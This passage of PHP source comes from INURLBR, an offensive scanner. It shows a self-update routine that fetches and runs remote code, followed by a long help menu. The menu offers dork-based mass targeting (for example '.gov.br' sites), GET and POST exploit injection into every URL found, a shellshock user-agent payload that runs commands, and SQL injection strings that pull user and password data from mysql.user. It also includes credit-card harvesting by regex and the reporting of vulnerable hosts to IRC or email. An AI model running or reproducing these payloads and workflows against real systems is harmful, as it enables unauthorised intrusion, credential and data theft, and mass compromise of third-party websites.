  510.     if (trim(fgets(STDIN)) == 'y') {
  511.  
  512.         $resultado = __request_info("https://raw.githubusercontent.com/googleinurl/SCANNER-INURLBR/master/inurlbr.php", $_SESSION["config"]["proxy"], NULL);
  513.  
  514.         if (not_isnull_empty($resultado['corpo'])) {
  515.  
  516.             unlink('inurlbr.php');
  517.             $varf = fopen('inurlbr.php', 'a');
  518.             fwrite($varf, $resultado['corpo']);
  519.             fclose($varf);
  520.             chmod('inurlbr.php', 0777);
  521.             echo "\nUPDATE DONE WITH SUCCESS!\n";
  522.             sleep(3);
  523.             system("chmod +x inurlbr.php | php inurlbr.php");
  524.             exit();
  525.         } else {
  526.  
  527.             echo system("command clear") . __bannerLogo();
  528.             echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
  529.         }
  530.     }
  531. }
  532.  
  533. ################################################################################
  534. #SECURITIES VALIDATION DOUBLE#####################################################
  535. ################################################################################
  536.  
  537. function not_isnull_empty($valor = NULL) {
  538.  
  539.     RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  540. }
  541.  
  542. ################################################################################
  543. #MENU###########################################################################
  544. ################################################################################
  545.  
  546. function __menu() {
  547.  
  548.     return system("command clear") . __getOut(__extra() . "        
  549. {$_SESSION["c1"]}_    _ ______ _      _____  
  550. | |  | |  ____| |    |  __ \
  551. | |__| | |__  | |    | |__) |
  552. |  __  |  __| | |    |  ___/
  553. | |  | | |____| |____| |    
  554. |_|  |_|______|______|_|
  555.  
  556. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current PHP version=>[ {$_SESSION["c1"]}" . phpversion() . "{$_SESSION["c0"]} ]
  557. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current script owner=>[ {$_SESSION["c1"]}" . get_current_user() . "{$_SESSION["c0"]} ]
  558. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current uname=>[ {$_SESSION["c1"]}" . php_uname() . "{$_SESSION["c0"]} ]
  559. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current pwd =>[ {$_SESSION["c1"]}" . getcwd() . "{$_SESSION["c0"]} ]
  560. " . $_SESSION['config']['line'] . "
  561.    
  562. {$_SESSION["c1"]}-h{$_SESSION["c0"]}
  563. {$_SESSION["c1"]}--help{$_SESSION["c0"]}   Alternative long length help command.
  564. {$_SESSION["c1"]}--ajuda{$_SESSION["c0"]}  Command to specify Help.
  565. {$_SESSION["c1"]}--info{$_SESSION["c0"]}   Information script.
  566. {$_SESSION["c1"]}--update{$_SESSION["c0"]} Code update.    
  567. {$_SESSION["c1"]}-q{$_SESSION["c0"]}       Choose which search engine you want through [{$_SESSION["c2"]}1...24{$_SESSION["c0"]}] / [{$_SESSION["c2"]}e1..6{$_SESSION["c0"]}]]:
  568.     [options]:
  569.     {$_SESSION["c1"]}1{$_SESSION["c0"]}   - {$_SESSION["c2"]}GOOGLE / (CSE) GENERIC RANDOM / API
  570.     {$_SESSION["c1"]}2{$_SESSION["c0"]}   - {$_SESSION["c2"]}BING
  571.     {$_SESSION["c1"]}3{$_SESSION["c0"]}   - {$_SESSION["c2"]}YAHOO BR
  572.     {$_SESSION["c1"]}4{$_SESSION["c0"]}   - {$_SESSION["c2"]}ASK
  573.     {$_SESSION["c1"]}5{$_SESSION["c0"]}   - {$_SESSION["c2"]}HAO123 BR
  574.     {$_SESSION["c1"]}6{$_SESSION["c0"]}   - {$_SESSION["c2"]}GOOGLE (API)
  575.     {$_SESSION["c1"]}7{$_SESSION["c0"]}   - {$_SESSION["c2"]}LYCOS
  576.     {$_SESSION["c1"]}8{$_SESSION["c0"]}   - {$_SESSION["c2"]}UOL BR
  577.     {$_SESSION["c1"]}9{$_SESSION["c0"]}   - {$_SESSION["c2"]}YAHOO US
  578.     {$_SESSION["c1"]}10{$_SESSION["c0"]}  - {$_SESSION["c2"]}SAPO
  579.     {$_SESSION["c1"]}11{$_SESSION["c0"]}  - {$_SESSION["c2"]}DMOZ
  580.     {$_SESSION["c1"]}12{$_SESSION["c0"]}  - {$_SESSION["c2"]}GIGABLAST
  581.     {$_SESSION["c1"]}13{$_SESSION["c0"]}  - {$_SESSION["c2"]}NEVER
  582.     {$_SESSION["c1"]}14{$_SESSION["c0"]}  - {$_SESSION["c2"]}BAIDU BR
  583.     {$_SESSION["c1"]}15{$_SESSION["c0"]}  - {$_SESSION["c2"]}YANDEX
  584.     {$_SESSION["c1"]}16{$_SESSION["c0"]}  - {$_SESSION["c2"]}ZOO
  585.     {$_SESSION["c1"]}17{$_SESSION["c0"]}  - {$_SESSION["c2"]}HOTBOT
  586.     {$_SESSION["c1"]}18{$_SESSION["c0"]}  - {$_SESSION["c2"]}ZHONGSOU
  587.     {$_SESSION["c1"]}19{$_SESSION["c0"]}  - {$_SESSION["c2"]}HKSEARCH
  588.     {$_SESSION["c1"]}20{$_SESSION["c0"]}  - {$_SESSION["c2"]}EZILION
  589.     {$_SESSION["c1"]}21{$_SESSION["c0"]}  - {$_SESSION["c2"]}SOGOU
  590.     {$_SESSION["c1"]}22{$_SESSION["c0"]}  - {$_SESSION["c2"]}DUCK DUCK GO
  591.     {$_SESSION["c1"]}23{$_SESSION["c0"]}  - {$_SESSION["c2"]}BOOROW
  592.     {$_SESSION["c1"]}24{$_SESSION["c0"]}  - {$_SESSION["c2"]}GOOGLE(CSE) GENERIC RANDOM
  593.     ----------------------------------------
  594.                 SPECIAL MOTORS
  595.     ----------------------------------------
  596.     {$_SESSION["c1"]}e1{$_SESSION["c0"]}  - {$_SESSION["c2"]}TOR FIND
  597.     {$_SESSION["c1"]}e2{$_SESSION["c0"]}  - {$_SESSION["c2"]}ELEPHANT
  598.     {$_SESSION["c1"]}e3{$_SESSION["c0"]}  - {$_SESSION["c2"]}TORSEARCH
  599.     {$_SESSION["c1"]}e4{$_SESSION["c0"]}  - {$_SESSION["c2"]}WIKILEAKS
  600.     {$_SESSION["c1"]}e5{$_SESSION["c0"]}  - {$_SESSION["c2"]}OTN
  601.     {$_SESSION["c1"]}e6{$_SESSION["c0"]}  - {$_SESSION["c2"]}EXPLOITS SHODAN
  602.     ----------------------------------------
  603.     {$_SESSION["c1"]}all{$_SESSION["c0"]} - {$_SESSION["c2"]}All search engines / not special motors{$_SESSION["c0"]}
  604.     Default:    {$_SESSION["c1"]}1{$_SESSION["c0"]}
  605.     Example: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  606.     Usage:   {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1{$_SESSION["c0"]}
  607.              {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}5{$_SESSION["c0"]}
  608.               Using more than one engine:  {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1,2,5,6,11,24{$_SESSION["c0"]}
  609.               Using all engines:      {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}all{$_SESSION["c0"]}
  610.    
  611. {$_SESSION["c1"]}--proxy{$_SESSION["c0"]} Choose which proxy you want to use through the search engine:
  612.     Example: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}{proxy:port}{$_SESSION["c0"]}
  613.     Usage:   {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}localhost:8118{$_SESSION["c0"]}
  614.              {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}socks5://googleinurl@localhost:9050{$_SESSION["c0"]}
  615.              {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}http://admin:12334@172.16.0.90:8080{$_SESSION["c0"]}
  616.  
  617. {$_SESSION["c1"]}--proxy-file{$_SESSION["c0"]} Set font file to randomize your proxy to each search engine.
  618.     Example: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}{proxys}{$_SESSION["c0"]}
  619.     Usage:   {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}proxys_list.txt{$_SESSION["c0"]}
  620.  
  621. {$_SESSION["c1"]}--time-proxy{$_SESSION["c0"]} Set the time how often the proxy will be exchanged.
  622.     Example: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  623.     Usage:   {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}10{$_SESSION["c0"]}
  624.  
  625. {$_SESSION["c1"]}--proxy-http-file{$_SESSION["c0"]} Set file with urls http proxy,
  626.     are used to bular capch search engines
  627.     Example: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}{youfilehttp}{$_SESSION["c0"]}
  628.     Usage:   {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}http_proxys.txt{$_SESSION["c0"]}
  629.        
  630.  
  631. {$_SESSION["c1"]}--tor-random{$_SESSION["c0"]} Enables the TOR function, each usage links an unique IP.
  632.  
  633. {$_SESSION["c1"]}-t{$_SESSION["c0"]}  Choose the validation type: op {$_SESSION["c2"]}1, 2, 3, 4, 5{$_SESSION["c0"]}
  634.     [options]:
  635.     {$_SESSION["c2"]}1{$_SESSION["c0"]}   - The first type uses default errors considering the script:
  636.     It establishes connection with the exploit through the get method.
  637.     Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  638.  
  639.     {$_SESSION["c2"]}2{$_SESSION["c0"]}   -  The second type tries to valid the error defined by: {$_SESSION["c1"]}-a={$_SESSION["c2"]}'VALUE_INSIDE_THE _TARGET'{$_SESSION["c0"]}
  640.     It also establishes connection with the exploit through the get method
  641.     Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  642.  
  643.     {$_SESSION["c2"]}3{$_SESSION["c0"]}   - The third type combine both first and second types:
  644.     Then, of course, it also establishes connection with the exploit through the get method
  645.     Demo: www.target.com.br{$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  646.     Default:    {$_SESSION["c2"]}1{$_SESSION["c0"]}
  647.     Example: {$_SESSION["c1"]}-t {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  648.     Usage:   {$_SESSION["c1"]}-t {$_SESSION["c2"]}1{$_SESSION["c0"]}
  649.    
  650.     {$_SESSION["c2"]}4{$_SESSION["c0"]}   - The fourth type a validation based on source file and will be enabled scanner standard functions.
  651.     The source file their values are concatenated with target url.
  652.     - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
  653.     - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  654.     Explicative:
  655.     Source file values:
  656.     /admin/index.php?id=
  657.     /pag/index.php?id=
  658.     /brazil.php?new=
  659.     Demo:
  660.     www.target.com.br/admin/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  661.     www.target.com.br/pag/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  662.     www.target.com.br/brazil.php?new={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  663.    
  664.     {$_SESSION["c2"]}5{$_SESSION["c0"]}   - (FIND PAGE) The fifth type of validation based on the source file,
  665.     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
  666.     - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
  667.     - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  668.     Explicative:
  669.     Source file values:
  670.     /admin/admin.php
  671.     /admin.asp
  672.     /admin.aspx
  673.     Demo:
  674.     www.target.com.br/admin/admin.php
  675.     www.target.com.br/admin.asp
  676.     www.target.com.br/admin.aspx
  677.     Observation: If it shows the code 200 will be separated in the output file
  678.  
  679.     DEFAULT ERRORS:  
  680.     {$_SESSION["c11"]}
  681.     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK,
  682.     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
  683.     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  684.     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
  685.     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA,
  686.     [*]ERROR INDEFINITE
  687.     {$_SESSION["c0"]}
  688.        
  689. {$_SESSION["c1"]}--dork{$_SESSION["c0"]} Defines which dork the search engine will use.
  690.     Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{dork}{$_SESSION["c0"]}
  691.     Usage:   {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br inurl:php? id'{$_SESSION["c0"]}
  692.     - Using multiples dorks:
  693.     Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{[DORK]dork1[DORK]dork2[DORK]dork3}{$_SESSION["c0"]}
  694.     Usage:   {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'{$_SESSION["c0"]}
  695.  
  696. {$_SESSION["c1"]}--dork-file{$_SESSION["c0"]} Set font file with your search dorks.
  697.     Example: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}{dork_file}{$_SESSION["c0"]}
  698.     Usage:   {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks.txt'{$_SESSION["c0"]}
  699.  
  700. {$_SESSION["c1"]}--exploit-get{$_SESSION["c0"]} Defines which exploit will be injected through the GET method to each URL found.
  701.     Example: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}{exploit_get}{$_SESSION["c0"]}
  702.     Usage:   {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?'´%270x27;\"{$_SESSION["c0"]}
  703.    
  704. {$_SESSION["c1"]}--exploit-post{$_SESSION["c0"]} Defines which exploit will be injected through the POST method to each URL found.
  705.     Example: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}{exploit_post}{$_SESSION["c0"]}
  706.     Usage:   {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'{$_SESSION["c0"]}
  707.    
  708. {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]} Defines which exploit/parameter will be executed in the options: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all{$_SESSION["c0"]}.  
  709.     The exploit-command will be identified by the paramaters: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}      
  710.     Ex {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf' {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'curl -v {$_SESSION["c8"]}_TARGET_{$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  711.     _TARGET_ is the specified URL/TARGET obtained by the process
  712.     _EXPLOIT_ is the exploit/parameter defined by the option {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
  713.     Example: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}{exploit-command}{$_SESSION["c0"]}
  714.     Usage:   {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf'{$_SESSION["c0"]}  
  715.    
  716. {$_SESSION["c1"]}-a{$_SESSION["c0"]}  Specify the string that will be used on the search script:
  717.     Example: {$_SESSION["c1"]}-a {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  718.     Usage:   {$_SESSION["c1"]}-a {$_SESSION["c2"]}'<title>hello world</title>'{$_SESSION["c0"]}
  719.    
  720. {$_SESSION["c1"]}-d{$_SESSION["c0"]}  Specify the script usage op {$_SESSION["c2"]}1, 2, 3, 4, 5.{$_SESSION["c0"]}
  721.     Example: {$_SESSION["c1"]}-d {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  722.     Usage:   {$_SESSION["c1"]}-d {$_SESSION["c2"]}1 {$_SESSION["c0"]}/URL of the search engine.
  723.              {$_SESSION["c1"]}-d {$_SESSION["c2"]}2 {$_SESSION["c0"]}/Show all the url.
  724.              {$_SESSION["c1"]}-d {$_SESSION["c2"]}3 {$_SESSION["c0"]}/Detailed request of every URL.
  725.              {$_SESSION["c1"]}-d {$_SESSION["c2"]}4 {$_SESSION["c0"]}/Shows the HTML of every URL.
  726.              {$_SESSION["c1"]}-d {$_SESSION["c2"]}5 {$_SESSION["c0"]}/Detailed request of all URLs.
  727.              {$_SESSION["c1"]}-d {$_SESSION["c2"]}6 {$_SESSION["c0"]}/Detailed PING - PONG irc.    
  728.            
  729. {$_SESSION["c1"]}-s{$_SESSION["c0"]}  Specify the output file where it will be saved the vulnerable URLs.
  730.    
  731.     Example: {$_SESSION["c1"]}-s {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  732.     Usage:   {$_SESSION["c1"]}-s {$_SESSION["c2"]}your_file.txt
  733.    
  734. {$_SESSION["c1"]}-o{$_SESSION["c0"]}  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
  735.     Example: {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file_where_my_urls_are}{$_SESSION["c0"]}
  736.     Usage:   {$_SESSION["c1"]}-o {$_SESSION["c2"]}tests.txt
  737.  
  738. {$_SESSION["c1"]}--persist{$_SESSION["c0"]}  Attempts when Google blocks your search.
  739.     The script tries to another google host / default = 4
  740.     Example: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}{number_attempts}{$_SESSION["c0"]}
  741.     Usage:   {$_SESSION["c1"]}--persist {$_SESSION["c2"]}7
  742.  
  743. {$_SESSION["c1"]}--ifredirect{$_SESSION["c0"]}  Return validation method post REDIRECT_URL
  744.     Example: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}{string_validation}{$_SESSION["c0"]}
  745.     Usage:   {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}'/admin/painel.php'
  746.  
  747. {$_SESSION["c1"]}-m{$_SESSION["c0"]}  Enable the search for emails on the urls specified.
  748.  
  749. {$_SESSION["c1"]}-u{$_SESSION["c0"]}  Enables the search for URL lists on the url specified.
  750.  
  751. {$_SESSION["c1"]}--gc{$_SESSION["c0"]} Enable validation of values ​​with google webcache.
  752.    
  753. {$_SESSION["c1"]}--pr{$_SESSION["c0"]}  Progressive scan, used to set operators (dorks),
  754.     makes the search of a dork and valid results, then goes a dork at a time.
  755.  
  756. {$_SESSION["c1"]}--file-cookie{$_SESSION["c0"]} Open cookie file.
  757.    
  758. {$_SESSION["c1"]}--save-as{$_SESSION["c0"]} Save results in a certain place.
  759.  
  760. {$_SESSION["c1"]}--shellshock{$_SESSION["c0"]} Explore shellshock vulnerability by setting a malicious user-agent.
  761.  
  762. {$_SESSION["c1"]}--popup{$_SESSION["c0"]} Run --command all or vuln in a parallel terminal.
  763.  
  764. {$_SESSION["c1"]}--cms-check{$_SESSION["c0"]} Enable simple check if the url / target is using CMS.
  765.  
  766. {$_SESSION["c1"]}--no-banner{$_SESSION["c0"]} Remove the script presentation banner.
  767.    
  768. {$_SESSION["c1"]}--unique{$_SESSION["c0"]} Filter results in unique domains.
  769.  
  770. {$_SESSION["c1"]}--beep{$_SESSION["c0"]} Beep sound when a vulnerability is found.
  771.    
  772. {$_SESSION["c1"]}--alexa-rank{$_SESSION["c0"]} Show alexa positioning in the results.
  773.    
  774. {$_SESSION["c1"]}--robots{$_SESSION["c0"]} Show values file robots.
  775.      
  776. {$_SESSION["c1"]}--range{$_SESSION["c0"]} Set range IP.
  777.      Example: {$_SESSION["c1"]}--range {$_SESSION["c2"]}{range_start,rage_end}{$_SESSION["c0"]}
  778.      Usage:   {$_SESSION["c1"]}--range {$_SESSION["c2"]}'172.16.0.5#172.16.0.255'
  779.  
  780. {$_SESSION["c1"]}--range-rand{$_SESSION["c0"]} Set amount of random ips.
  781.      Example: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}{rand}{$_SESSION["c0"]}
  782.      Usage:   {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}'50'
  783.  
  784. {$_SESSION["c1"]}--irc{$_SESSION["c0"]} Sending vulnerable to IRC / server channel.
  785.      Example: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}{server#channel}{$_SESSION["c0"]}
  786.      Usage:   {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil'
  787.  
  788. {$_SESSION["c1"]}--http-header{$_SESSION["c0"]} Set HTTP header.
  789.      Example: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
  790.      Usage:   {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm=\"Top Secret\"'
  791.          
  792. {$_SESSION["c1"]}--sedmail{$_SESSION["c0"]} Sending vulnerable to email.
  793.      Example: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
  794.      Usage:   {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}youemail@inurl.com.br
  795.          
  796. {$_SESSION["c1"]}--delay{$_SESSION["c0"]} Delay between research processes.
  797.      Example: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  798.      Usage:   {$_SESSION["c1"]}--delay {$_SESSION["c2"]}10
  799.  
  800. {$_SESSION["c1"]}--time-out{$_SESSION["c0"]} Timeout to exit the process.
  801.      Example: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  802.      Usage:   {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}10
  803.  
  804. {$_SESSION["c1"]}--ifurl{$_SESSION["c0"]} Filter URLs based on their argument.
  805.      Example: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}{ifurl}{$_SESSION["c0"]}
  806.      Usage:   {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}index.php?id=
  807.  
  808. {$_SESSION["c1"]}--ifcode{$_SESSION["c0"]} Valid results based on your return http code.
  809.      Example: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}{ifcode}{$_SESSION["c0"]}
  810.      Usage:   {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}200
  811.  
  812. {$_SESSION["c1"]}--ifemail{$_SESSION["c0"]} Filter E-mails based on their argument.
  813.     Example: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}{file_where_my_emails_are}{$_SESSION["c0"]}
  814.     Usage:   {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}sp.gov.br
  815.  
  816. {$_SESSION["c1"]}--url-reference{$_SESSION["c0"]} Define referring URL in the request to send him against the target.
  817.      Example: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}{url}{$_SESSION["c0"]}
  818.      Usage:   {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}http://target.com/admin/user/valid.php
  819.  
  820. {$_SESSION["c1"]}--mp{$_SESSION["c0"]} Limits the number of pages in the search engines.
  821.     Example: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}{limit}{$_SESSION["c0"]}
  822.     Usage:   {$_SESSION["c1"]}--mp {$_SESSION["c2"]}50
  823.    
  824. {$_SESSION["c1"]}--user-agent{$_SESSION["c0"]} Define the user agent used in its request against the target.
  825.      Example: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}{agent}{$_SESSION["c0"]}
  826.      Usage:   {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
  827.      Usage-exploit / SHELLSHOCK:  
  828.      {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"'
  829.      Complete command:    
  830.      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
  831.  
  832. {$_SESSION["c1"]}--sall{$_SESSION["c0"]} Saves all urls found by the scanner.
  833.     Example: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  834.     Usage:   {$_SESSION["c1"]}--sall {$_SESSION["c2"]}your_file.txt
  835.  
  836. {$_SESSION["c1"]}--command-vul{$_SESSION["c0"]} Every vulnerable URL found will execute this command parameters.
  837.     Example: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  838.     Usage:   {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  839.              {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  840.              {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  841.                  
  842. {$_SESSION["c1"]}--command-all{$_SESSION["c0"]} Use this commmand to specify a single command to EVERY URL found.
  843.     Example: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  844.     Usage:   {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  845.              {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  846.              {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  847.    [!] Observation:
  848.  
  849.    {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} will be replaced by the URL/target found, although if the user  
  850.    doesn't input the get, only the domain will be executed.
  851.  
  852.    {$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c0"]} will be replaced by the original URL / target found.
  853.      
  854.    {$_SESSION["c14"]}_TARGETXPL_{$_SESSION["c0"]} will be replaced by the original URL / target found + EXPLOIT --exploit-get.
  855.      
  856.    {$_SESSION["c9"]}_TARGETIP_{$_SESSION["c0"]} return of ip URL / target found.
  857.        
  858.    {$_SESSION["c8"]}_URI_{$_SESSION["c0"]} Back URL set of folders / target found.
  859.        
  860.    {$_SESSION["c15"]}_RANDOM_{$_SESSION["c0"]} Random strings.
  861.        
  862.    {$_SESSION["c9"]}_PORT_{$_SESSION["c0"]} Capture port of the current test, within the --port-scan process.
  863.  
  864.    {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}  will be replaced by the specified command argument {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
  865.   The exploit-command will be identified by the parameters {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
  866.  
  867. {$_SESSION["c1"]}--replace{$_SESSION["c0"]} Replace values ​​in the target URL.
  868.    Example:  {$_SESSION["c1"]}--replace {$_SESSION["c2"]}{value_old[INURL]value_new}{$_SESSION["c0"]}
  869.     Usage:   {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}
  870.              {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'{$_SESSION["c0"]}
  871.              {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.aspx?id=[INURL]index.aspx?id=1%27´'{$_SESSION["c0"]}
  872.                  
  873. {$_SESSION["c1"]}--remove{$_SESSION["c0"]} Remove values ​​in the target URL.
  874.      Example: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  875.      Usage:   {$_SESSION["c1"]}--remove {$_SESSION["c2"]}'/admin.php?id=0'
  876.              
  877. {$_SESSION["c1"]}--regexp{$_SESSION["c0"]} Using regular expression to validate his research, the value of the
  878.    Expression will be sought within the target/URL.
  879.    Example:  {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
  880.    All Major Credit Cards:
  881.    Usage:    {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'{$_SESSION["c0"]}
  882.    
  883.    IP Addresses:
  884.    Usage:    {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'{$_SESSION["c0"]}
  885.    
  886.    EMAIL:  
  887.    Usage:    {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  888.    
  889.  
